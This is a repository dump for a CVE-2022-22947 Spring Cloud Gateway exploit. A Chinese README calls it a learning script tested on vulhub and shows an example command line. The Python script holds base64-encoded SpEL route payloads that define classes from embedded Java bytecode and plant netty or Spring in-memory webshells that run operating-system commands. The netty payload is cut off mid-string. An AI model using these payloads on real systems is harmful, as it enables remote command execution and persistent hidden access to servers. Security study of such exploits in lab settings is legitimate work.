├── README.md
├── img.png
└── spring_cloud_gateway_memshell.py


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2022-22947 memshell
 2 | ###此脚本不完善,仅作学习用途,请勿非法使用
 3 | 
 4 | 
 5 | 基于 [c0ny1](https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/)
 6 | 大佬的博客做的学习脚本,可写入netty和spring内存马.
 7 | 
 8 | 测试环境为 [vulhub](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947)
 9 | 
10 | ```
11 | eg:xx.py http://127.0.0.1:8080 netty whoami
12 | ```
13 | 
14 | ![img.png](img.png)
15 | 
16 | 


--------------------------------------------------------------------------------
/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/viemsr/spring_cloud_gateway_memshell/254b880875074cc42e83f7b712ce7a365a00602b/img.png


--------------------------------------------------------------------------------
/spring_cloud_gateway_memshell.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import sys
 3 | import base64
 4 | headers={'Content-Type': 'application/json'}
 5 | springshell='''ewogICJwcmVkaWNhdGVzIjogWwogICAgewogICAgICAibmFtZSI6ICJQYXRoIiwKICAgICAgImFyZ3MiOiB7CiAgICAgICAgIl9nZW5rZXlfMCI6ICIvbmV3X3JvdXRlLyoqIgogICAgICB9CiAgICB9CiAgXSwKICAiZmlsdGVycyI6IFsKICAgIHsKICAgICAgIm5hbWUiOiAiUmV3cml0ZVBhdGgiLAogICAgICAiYXJncyI6IHsKICAgICAgICAiX2dlbmtleV8wIjogIiN7VChvcmcuc3ByaW5nZnJhbWV3b3JrLmNnbGliLmNvcmUuUmVmbGVjdFV0aWxzKS5kZWZpbmVDbGFzcygnU3ByaW5nUmVxdWVzdE1hcHBpbmdNZW1zaGVsbCcsVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuQmFzZTY0VXRpbHMpLmRlY29kZUZyb21TdHJpbmcoJ3l2NjZ2Z0FBQURRQWpnb0FCZ0JMQ0FCTUNnQUdBRTBJQURBSEFFNEhBRThIQUZBSEFGRUtBQVVBVWdvQUJ3QlRCd0JVQ0FBeUJ3QlZCd0JXQ2dBT0FFc0lBRmNLQUE0QVdBY0FXUWNBV2dvQUVnQmJDQUJjQ2dBSUFGMEtBQXNBU3dvQUJ3QmVDQUJmQndCZ0NBQmhCd0JpQ2dCakFHUUtBR01BWlFvQVpnQm5DZ0FjQUdnSUFHa0tBQndBYWdvQUhBQnJCd0JzQ1FCdEFHNEtBQ1FBYndFQUJqeHBibWwwUGdFQUF5Z3BWZ0VBQkVOdlpHVUJBQTlNYVc1bFRuVnRZbVZ5VkdGaWJHVUJBQkpNYjJOaGJGWmhjbWxoWW14bFZHRmliR1VCQUFSMGFHbHpBUUFlVEZOd2NtbHVaMUpsY1hWbGMzUk5ZWEJ3YVc1blRXVnRjMmhsYkd3N0FRQUlaRzlKYm1wbFkzUUJBQ1lvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQUZYSmxaMmx6ZEdWeVNHRnVaR3hsY2sxbGRHaHZaQUVBR2t4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBT1pYaGxZM1YwWlVOdmJXMWhibVFCQUF0d1lYUm9VR0YwZEdWeWJnRUFNa3h2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOTFkR2xzTDNCaGRIUmxjbTR2VUdGMGFGQmhkSFJsY200N0FRQVljR0YwZEdWeWJuTlNaWEYxWlhOMFEyOXVaR2wwYVc5dUFRQk1URzl5Wnk5emNISnBibWRtY21GdFpYZHZjbXN2ZDJWaUwzSmxZV04wYVhabEwzSmxjM1ZzZEM5amIyNWthWFJwYjI0dlVHRjBkR1Z5Ym5OU1pYRjFaWE4wUTI5dVpHbDBhVzl1T3dFQUVuSmxjWFZsYzNSTllYQndhVzVuU1c1bWJ3RUFRMHh2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOXlaV0ZqZEdsMlpTOXlaWE4xYkhRdmJXVjBhRzlrTDFKbGNYVmxjM1JOWVhCd2FXNW5TVzVtYnpzQkFBRmxBUUFWVEdwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0N0FRQWNjbVZ4ZFdWemRFMWhjSEJwYm1kSVlXNWtiR1Z5VFdGd2NHbHVad0VBRWt4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUEyMXpad0VBRWt4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQURWTjBZV05yVFdGd1ZHRmliR1VIQUU4SEFGVUhBR0FCQUJCTlpYUm9iMlJRWVhKaGJXVjBaWEp6QVFBOUtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTlvZEhSd0wxSmxjM0J2Ym5ObFJXNTBhWFI1T3dFQUEyTnRaQUVBQ21WNFpXTlNaWE4xYkhRQkFBcEZlR05sY0hScGIyNXpCd0J3QVFBS1UyOTFjbU5sUm1sc1pRRUFJVk53Y21sdVoxSmxjWFZsYzNSTllYQndhVzVuVFdWdGMyaGxiR3d1YW1GMllRd0FKd0FvQVFBTWFXNXFaV04wTFhOMFlYSjBEQUJ4QUhJQkFBOXFZWFpoTDJ4aGJtY3ZRMnhoYzNNQkFCQnFZWFpoTDJ4aGJtY3ZUMkpxWldOMEFRQVlhbUYyWVM5c1lXNW5MM0psWm14bFkzUXZUV1YwYUc5a0FRQkJiM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDIxbGRHaHZaQzlTWlhGMVpYTjBUV0Z3Y0dsdVowbHVabThNQUhNQWRBd0FkUUIyQVFBY1UzQnlhVzVuVW1WeGRXVnpkRTFoY0hCcGJtZE5aVzF6YUdWc2JBRUFFR3BoZG1FdmJHRnVaeTlUZEhKcGJtY0JBRFp2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOTFkR2xzTDNCaGRIUmxjbTR2VUdGMGFGQmhkSFJsY201UVlYSnpaWElCQUFVdlIxbFhRUXdBZHdCNEFRQktiM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDJOdmJtUnBkR2x2Ymk5UVlYUjBaWEp1YzFKbGNYVmxjM1JEYjI1a2FYUnBiMjRCQURCdmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTkxZEdsc0wzQmhkSFJsY200dlVHRjBhRkJoZEhSbGNtNE1BQ2NBZVFFQUFBd0FKd0I2REFCN0FId0JBQTVwYm1wbFkzUXRjM1ZqWTJWemN3RUFFMnBoZG1FdmJHRnVaeTlGZUdObGNIUnBiMjRCQUF4cGJtcGxZM1F0WlhKeWIzSUJBQkZxWVhaaEwzVjBhV3d2VTJOaGJtNWxjZ2NBZlF3QWZnQi9EQUNBQUlFSEFJSU1BSU1BaEF3QUp3Q0ZBUUFDWEVFTUFJWUFod3dBaUFDSkFRQW5iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTlvZEhSd0wxSmxjM0J2Ym5ObFJXNTBhWFI1QndDS0RBQ0xBSXdNQUNjQWpRRUFFMnBoZG1FdmFXOHZTVTlGZUdObGNIUnBiMjRCQUFoblpYUkRiR0Z6Y3dFQUV5Z3BUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQkZuWlhSRVpXTnNZWEpsWkUxbGRHaHZaQUVBUUNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1Wnp0YlRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkRzQkFBMXpaWFJCWTJObGMzTnBZbXhsQVFBRUtGb3BWZ0VBQlhCaGNuTmxBUUJHS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWIzSm5MM053Y21sdVoyWnlZVzFsZDI5eWF5OTNaV0l2ZFhScGJDOXdZWFIwWlhKdUwxQmhkR2hRWVhSMFpYSnVPd0VBTmloYlRHOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNWMGFXd3ZjR0YwZEdWeWJpOVFZWFJvVUdGMGRHVnlianNwVmdFQ0pDaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6dE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDJOdmJtUnBkR2x2Ymk5UVlYUjBaWEp1YzFKbGNYVmxjM1JEYjI1a2FYUnBiMjQ3VEc5eVp5OXpjSEpwYm1kbWNtRnRaWGR2Y21zdmQyVmlMM0psWVdOMGFYWmxMM0psYzNWc2RDOWpiMjVrYVhScGIyNHZVbVZ4ZFdWemRFMWxkR2h2WkhOU1pYRjFaWE4wUTI5dVpHbDBhVzl1TzB4dmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTl5WldGamRHbDJaUzl5WlhOMWJIUXZZMjl1WkdsMGFXOXVMMUJoY21GdGMxSmxjWFZsYzNSRGIyNWthWFJwYjI0N1RHOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNKbFlXTjBhWFpsTDNKbGMzVnNkQzlqYjI1a2FYUnBiMjR2U0dWaFpHVnljMUpsY1hWbGMzUkRiMjVrYVhScGIyNDdURzl5Wnk5emNISnBibWRtY21GdFpYZHZjbXN2ZDJWaUwzSmxZV04wYVhabEwzSmxjM1ZzZEM5amIyNWthWFJwYjI0dlEyOXVjM1Z0WlhOU1pYRjFaWE4wUTI5dVpHbDBhVzl1TzB4dmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTl5WldGamRHbDJaUzl5WlhOMWJIUXZZMjl1WkdsMGFXOXVMMUJ5YjJSMVkyVnpVbVZ4ZFdWemRFTnZibVJwZEdsdmJqdE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDJOdmJtUnBkR2x2Ymk5U1pYRjFaWE4wUTI5dVpHbDBhVzl1T3lsV0FRQUdhVzUyYjJ0bEFRQTVLRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPMXRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QVFBUmFtRjJZUzlzWVc1bkwxSjFiblJwYldVQkFBcG5aWFJTZFc1MGFXMWxBUUFWS0NsTWFtRjJZUzlzWVc1bkwxSjFiblJwYldVN0FRQUVaWGhsWXdFQUp5aE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUJHNWxlSFFCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFJMjl5Wnk5emNISnBibWRtY21GdFpYZHZjbXN2YUhSMGNDOUlkSFJ3VTNSaGRIVnpBUUFDVDBzQkFDVk1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTlvZEhSd0wwaDBkSEJUZEdGMGRYTTdBUUE2S0V4cVlYWmhMMnhoYm1jdlQySnFaV04wTzB4dmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwyaDBkSEF2U0hSMGNGTjBZWFIxY3pzcFZnQWhBQXNBQmdBQUFBQUFBd0FCQUNjQUtBQUJBQ2tBQUFBdkFBRUFBUUFBQUFVcXR3QUJzUUFBQUFJQUtnQUFBQVlBQVFBQUFBMEFLd0FBQUF3QUFRQUFBQVVBTEFBdEFBQUFDUUF1QUM4QUFnQXBBQUFCVXdBS0FBY0FBQUNTRWdKTUtyWUFBeElFQnIwQUJWa0RFZ1pUV1FRU0IxTlpCUklJVTdZQUNVMHNCTFlBQ2hJTEVnd0V2UUFGV1FNU0RWTzJBQWxPdXdBT1diY0FEeElRdGdBUk9nUzdBQkpaQkwwQUUxa0RHUVJUdHdBVU9nVzdBQWhaRWhVWkJRRUJBUUVCQWJjQUZqb0dMQ29HdlFBR1dRTzdBQXRadHdBWFUxa0VMVk5aQlJrR1U3WUFHRmNTR1V5bkFBZE5FaHRNSzdBQUFRQURBSWtBakFBYUFBTUFLZ0FBQURZQURRQUFBQThBQXdBUkFDQUFFZ0FsQUJNQU5nQVVBRVFBRlFCV0FCWUFhUUFYQUlZQUdBQ0pBQnNBakFBWkFJMEFHZ0NRQUJ3QUt3QUFBRklBQ0FBZ0FHa0FNQUF4QUFJQU5nQlRBRElBTVFBREFFUUFSUUF6QURRQUJBQldBRE1BTlFBMkFBVUFhUUFnQURjQU9BQUdBSTBBQXdBNUFEb0FBZ0FBQUpJQU93QThBQUFBQXdDUEFEMEFQZ0FCQUQ4QUFBQVRBQUwvQUl3QUFnY0FRQWNBUVFBQkJ3QkNBd0JEQUFBQUJRRUFPd0FBQUFFQU1nQkVBQU1BS1FBQUFHZ0FCQUFEQUFBQUpyc0FIRm00QUIwcnRnQWV0Z0FmdHdBZ0VpRzJBQ0syQUNOTnV3QWtXU3l5QUNXM0FDYXdBQUFBQWdBcUFBQUFDZ0FDQUFBQUlBQWFBQ0VBS3dBQUFDQUFBd0FBQUNZQUxBQXRBQUFBQUFBbUFFVUFQZ0FCQUJvQURBQkdBRDRBQWdCSEFBQUFCQUFCQUVnQVF3QUFBQVVCQUVVQUFBQUJBRWtBQUFBQ0FFbz0nKSxuZXcgamF2YXgubWFuYWdlbWVudC5sb2FkaW5nLk1MZXQobmV3IGphdmEubmV0LlVSTFswXSxUKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KEByZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nKX0iLAogICAgICAgICJfZ2Vua2V5XzEiOiAiLyR7cGF0aH0iCiAgICAgIH0KICAgIH0KICBdLAogICJ1cmkiOiAiaHR0cHM6Ly93eWEucGwiLAogICJvcmRlciI6IDAKfQ=='''
 6 | nettyshell='''ewogICJwcmVkaWNhdGVzIjogWwogICAgewogICAgICAibmFtZSI6ICJQYXRoIiwKICAgICAgImFyZ3MiOiB7CiAgICAgICAgIl9nZW5rZXlfMCI6ICIvbmV3X3JvdXRlLyoqIgogICAgICB9CiAgICB9CiAgXSwKICAiZmlsdGVycyI6IFsKICAgIHsKICAgICAgIm5hbWUiOiAiUmV3cml0ZVBhdGgiLAogICAgICAiYXJncyI6IHsKICAgICAgICAiX2dlbmtleV8wIjogIiN7VChvcmcuc3ByaW5nZnJhbWV3b3JrLmNnbGliLmNvcmUuUmVmbGVjdFV0aWxzKS5kZWZpbmVDbGFzcygnTmV0dHlNZW1zaGVsbCcsVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuQmFzZTY0VXRpbHMpLmRlY29kZUZyb21TdHJpbmcoJ3l2NjZ2Z0FBQURRQkZBb0FQZ0I5Q0FCK0J3Qi9DQUJUQndDQUNnQUZBSUVLQUlJQWd3Y0FoQW9BZ2dDRkNnQ0dBSWNLQUlZQWlBb0FDQUNKQ2dBRkFJb0lBSXNLQUl3QWpRZ0FTd29BQlFDT0NnQ1BBSU1LQUk4QWtBb0FCUUNSQ0FCT0NBQ1NCd0NUQ2dBWEFIMEtBSThBbEFnQWxRY0FsZ2dBbHdzQW1BQ1pDQUNhQ0FDYkN3Q2NBSjBIQUo0TEFDRUFud2dBb0FvQW9RQ2lDZ0NoQUtNSEFLUUtBS1VBcGdvQXBRQ25DZ0NvQUtrS0FDWUFxZ2dBcXdvQUpnQ3NDZ0FtQUswSkFLNEFyd29BRndDd0NnQWJBTEVMQUxJQXN3Y0F0QWtBdFFDMkNRQzNBTGdLQUxrQXVnb0FNZ0M3Q3dDOEFKOEpBTDBBdmdnQXZ3b0FvUURBQ3dDeUFNRUpBTUlBd3dzQXhBREZCd0RHQndESEFRQUdQR2x1YVhRK0FRQURLQ2xXQVFBRVEyOWtaUUVBRDB4cGJtVk9kVzFpWlhKVVlXSnNaUUVBRWt4dlkyRnNWbUZ5YVdGaWJHVlVZV0pzWlFFQUJIUm9hWE1CQUE5TVRtVjBkSGxOWlcxemFHVnNiRHNCQUFoa2IwbHVhbVZqZEFFQUZDZ3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFWWDNaaGJDUmthWE53YjNOaFlteGxVMlZ5ZG1WeUFRQVpUR3BoZG1FdmJHRnVaeTl5Wldac1pXTjBMMFpwWld4a093RUFGSFpoYkNSa2FYTndiM05oWW14bFUyVnlkbVZ5QVFBU1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUhYMk52Ym1acFp3RUFCbU52Ym1acFp3RUFFRjlrYjA5dVEyaGhibTVsYkVsdWFYUUJBQVowYUhKbFlXUUJBQUZwQVFBQlNRRUFDbWRsZEZSb2NtVmhaSE1CQUJwTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUIzUm9jbVZoWkhNQkFBRmxBUUFWVEdwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0N0FRQURiWE5uQVFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQU5VM1JoWTJ0TllYQlVZV0pzWlFjQXlBY0F5UWNBaEFjQWxnRUFEVzl1UTJoaGJtNWxiRWx1YVhRQkFGY29USEpsWVdOMGIzSXZibVYwZEhrdlEyOXVibVZqZEdsdmJrOWljMlZ5ZG1WeU8weHBieTl1WlhSMGVTOWphR0Z1Ym1Wc0wwTm9ZVzV1Wld3N1RHcGhkbUV2Ym1WMEwxTnZZMnRsZEVGa1pISmxjM003S1ZZQkFCSmpiMjV1WldOMGFXOXVUMkp6WlhKMlpYSUJBQ0pNY21WaFkzUnZjaTl1WlhSMGVTOURiMjV1WldOMGFXOXVUMkp6WlhKMlpYSTdBUUFIWTJoaGJtNWxiQUVBR2t4cGJ5OXVaWFIwZVM5amFHRnVibVZzTDBOb1lXNXVaV3c3QVFBTmMyOWphMlYwUVdSa2NtVnpjd0VBR0V4cVlYWmhMMjVsZEM5VGIyTnJaWFJCWkdSeVpYTnpPd0VBQ0hCcGNHVnNhVzVsQVFBaVRHbHZMMjVsZEhSNUwyTm9ZVzV1Wld3dlEyaGhibTVsYkZCcGNHVnNhVzVsT3dFQUVFMWxkR2h2WkZCaGNtRnRaWFJsY25NQkFBdGphR0Z1Ym1Wc1VtVmhaQUVBUFNoTWFXOHZibVYwZEhrdlkyaGhibTVsYkM5RGFHRnVibVZzU0dGdVpHeGxja052Ym5SbGVIUTdUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVllCQUFOamJXUUJBQXBsZUdWalVtVnpkV3gwQVFBTGFIUjBjRkpsY1hWbGMzUUJBQ2xNYVc4dmJtVjBkSGt2YUdGdVpHeGxjaTlqYjJSbFl5OW9kSFJ3TDBoMGRIQlNaWEYxWlhOME93RUFBMk4wZUFFQUtFeHBieTl1WlhSMGVTOWphR0Z1Ym1Wc0wwTm9ZVzV1Wld4SVlXNWtiR1Z5UTI5dWRHVjRkRHNIQUo0QkFBcEZlR05sY0hScGIyNXpBUUFFYzJWdVpBRUFiU2hNYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNTR0Z1Wkd4bGNrTnZiblJsZUhRN1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN1RHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUlkSFJ3VW1WemNHOXVjMlZUZEdGMGRYTTdLVllCQUFkamIyNTBaWGgwQVFBR2MzUmhkSFZ6QVFBd1RHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUlkSFJ3VW1WemNHOXVjMlZUZEdGMGRYTTdBUUFJY21WemNHOXVjMlVCQUM1TWFXOHZibVYwZEhrdmFHRnVaR3hsY2k5amIyUmxZeTlvZEhSd0wwWjFiR3hJZEhSd1VtVnpjRzl1YzJVN0FRQUtVMjkxY21ObFJtbHNaUUVBRWs1bGRIUjVUV1Z0YzJobGJHd3VhbUYyWVF3QVFBQkJBUUFNYVc1cVpXTjBMWE4wWVhKMEFRQVFhbUYyWVM5c1lXNW5MMVJvY21WaFpBRUFEMnBoZG1FdmJHRnVaeTlEYkdGemN3d0F5Z0RMQndESkRBRE1BTTBCQUJCcVlYWmhMMnhoYm1jdlQySnFaV04wREFET0FNOEhBTkFNQU5FQTBnd0Ewd0RVREFEVkFOWU1BTmNBU0FFQURrNWxkSFI1VjJWaVUyVnlkbVZ5QndESURBRFlBTmtNQU5vQTJ3Y0EzQXdBMHdEZERBRGVBTllCQUE5a2IwOXVRMmhoYm01bGJFbHVhWFFCQUExT1pYUjBlVTFsYlhOb1pXeHNEQURmQU9BQkFBNXBibXBsWTNRdGMzVmpZMlZ6Y3dFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQXhwYm1wbFkzUXRaWEp5YjNJSEFPRU1BR2NBNGdFQUgzSmxZV04wYjNJdWJHVm1kQzVvZEhSd1ZISmhabVpwWTBoaGJtUnNaWElCQUJCdFpXMXphR1ZzYkY5b1lXNWtiR1Z5QndEakRBRGtBT1VCQUNkcGJ5OXVaWFIwZVM5b1lXNWtiR1Z5TDJOdlpHVmpMMmgwZEhBdlNIUjBjRkpsY1hWbGMzUU1BT1lBNXdFQUJFZFpWMEVIQU9nTUFOZ0E2UXdBMHdEcUFRQVJhbUYyWVM5MWRHbHNMMU5qWVc1dVpYSUhBT3NNQU93QTdRd0E3Z0R2QndEd0RBRHhBUElNQUVBQTh3RUFBbHhCREFEMEFQVU1BUFlBU0FjQTl3d0ErQUI0REFCMEFIVU1BUGtBUVFjQStnd0Erd0Q4QVFBemFXOHZibVYwZEhrdmFHRnVaR3hsY2k5amIyUmxZeTlvZEhSd0wwUmxabUYxYkhSR2RXeHNTSFIwY0ZKbGMzQnZibk5sQndEOURBRCtBUDhIQVFBTUFRRUJBZ2NCQXd3QkJBRUZEQUJBQVFZSEFRY0hBUWdNQVFrQkNnRUFHWFJsZUhRdmNHeGhhVzQ3SUdOb1lYSnpaWFE5VlZSR0xUZ01BTjhCQ3d3QkRBRU5Cd0VPREFFUEFSQUhBUkVNQVJJQkV3RUFKV2x2TDI1bGRIUjVMMk5vWVc1dVpXd3ZRMmhoYm01bGJFUjFjR3hsZUVoaGJtUnNaWElCQUNkeVpXRmpkRzl5TDI1bGRIUjVMME5vWVc1dVpXeFFhWEJsYkdsdVpVTnZibVpwWjNWeVpYSUJBQkJxWVhaaEwyeGhibWN2VTNSeWFXNW5BUUFZYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2VFdWMGFHOWtBUUFSWjJWMFJHVmpiR0Z5WldSTlpYUm9iMlFCQUVBb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN1cweHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0tVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOU5aWFJvYjJRN0FRQU5jMlYwUVdOalpYTnphV0pzWlFFQUJDaGFLVllCQUFacGJuWnZhMlVCQURrb1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN1cweHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc0JBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlCY25KaGVRRUFDV2RsZEV4bGJtZDBhQUVBRlNoTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFNRRUFBMmRsZEFFQUp5aE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdEpLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFTnNZWE56QVFBVEtDbE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFCMmRsZEU1aGJXVUJBQWhqYjI1MFlXbHVjd0VBR3loTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHNwV2dFQUVHZGxkRVJsWTJ4aGNtVmtSbWxsYkdRQkFDMG9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pEc0JBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pBRUFKaWhNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QVFBTloyVjBVM1Z3WlhKamJHRnpjd0VBQTNObGRBRUFKeWhNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVmdFQUdHbHZMMjVsZEhSNUwyTm9ZVzV1Wld3dlEyaGhibTVsYkFFQUpDZ3BUR2x2TDI1bGRIUjVMMk5vWVc1dVpXd3ZRMmhoYm01bGJGQnBjR1ZzYVc1bE93RUFJR2x2TDI1bGRIUjVMMk5vWVc1dVpXd3ZRMmhoYm01bGJGQnBjR1ZzYVc1bEFRQUpZV1JrUW1WbWIzSmxBUUJwS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzB4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzB4cGJ5OXVaWFIwZVM5amFHRnVibVZzTDBOb1lXNXVaV3hJWVc1a2JHVnlPeWxNYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNVR2x3Wld4cGJtVTdBUUFIYUdWaFpHVnljd0VBS3lncFRHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUlkSFJ3U0dWaFpHVnljenNCQUNkcGJ5OXVaWFIwZVM5b1lXNWtiR1Z5TDJOdlpHVmpMMmgwZEhBdlNIUjBjRWhsWVdSbGNuTUJBQlVvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1ZvQkFDWW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5Pd0VBRVdwaGRtRXZiR0Z1Wnk5U2RXNTBhVzFsQVFBS1oyVjBVblZ1ZEdsdFpRRUFGU2dwVEdwaGRtRXZiR0Z1Wnk5U2RXNTBhVzFsT3dFQUJHVjRaV01CQUNjb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tVeHFZWFpoTDJ4aGJtY3ZVSEp2WTJWemN6c0JBQkZxWVhaaEwyeGhibWN2VUhKdlkyVnpjd0VBRG1kbGRFbHVjSFYwVTNSeVpXRnRBUUFYS0NsTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc0JBQmdvVEdwaGRtRXZhVzh2U1c1d2RYUlRkSEpsWVcwN0tWWUJBQXgxYzJWRVpXeHBiV2wwWlhJQkFDY29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwzVjBhV3d2VTJOaGJtNWxjanNCQUFSdVpYaDBBUUF1YVc4dmJtVjBkSGt2YUdGdVpHeGxjaTlqYjJSbFl5OW9kSFJ3TDBoMGRIQlNaWE53YjI1elpWTjBZWFIxY3dFQUFrOUxBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBUUFtYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNTR0Z1Wkd4bGNrTnZiblJsZUhRQkFBOW1hWEpsUTJoaGJtNWxiRkpsWVdRQkFEd29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhwYnk5dVpYUjBlUzlqYUdGdWJtVnNMME5vWVc1dVpXeElZVzVrYkdWeVEyOXVkR1Y0ZERzQkFDZHBieTl1WlhSMGVTOW9ZVzVrYkdWeUwyTnZaR1ZqTDJoMGRIQXZTSFIwY0ZabGNuTnBiMjRCQUFoSVZGUlFYekZmTVFFQUtVeHBieTl1WlhSMGVTOW9ZVzVrYkdWeUwyTnZaR1ZqTDJoMGRIQXZTSFIwY0ZabGNuTnBiMjQ3QVFBWmFXOHZibVYwZEhrdmRYUnBiQzlEYUdGeWMyVjBWWFJwYkFFQUJWVlVSbDg0QVFBYVRHcGhkbUV2Ym1sdkwyTm9ZWEp6WlhRdlEyaGhjbk5sZERzQkFCaHBieTl1WlhSMGVTOWlkV1ptWlhJdlZXNXdiMjlzWldRQkFBeGpiM0JwWldSQ2RXWm1aWElCQUUwb1RHcGhkbUV2YkdGdVp5OURhR0Z5VTJWeGRXVnVZMlU3VEdwaGRtRXZibWx2TDJOb1lYSnpaWFF2UTJoaGNuTmxkRHNwVEdsdkwyNWxkSFI1TDJKMVptWmxjaTlDZVhSbFFuVm1Pd0VBZFNoTWFXOHZibVYwZEhrdmFHRnVaR3hsY2k5amIyUmxZeTlvZEhSd0wwaDBkSEJXWlhKemFXOXVPMHhwYnk5dVpYUjBlUzlvWVc1a2JHVnlMMk52WkdWakwyaDBkSEF2U0hSMGNGSmxjM0J2Ym5ObFUzUmhkSFZ6TzB4cGJ5OXV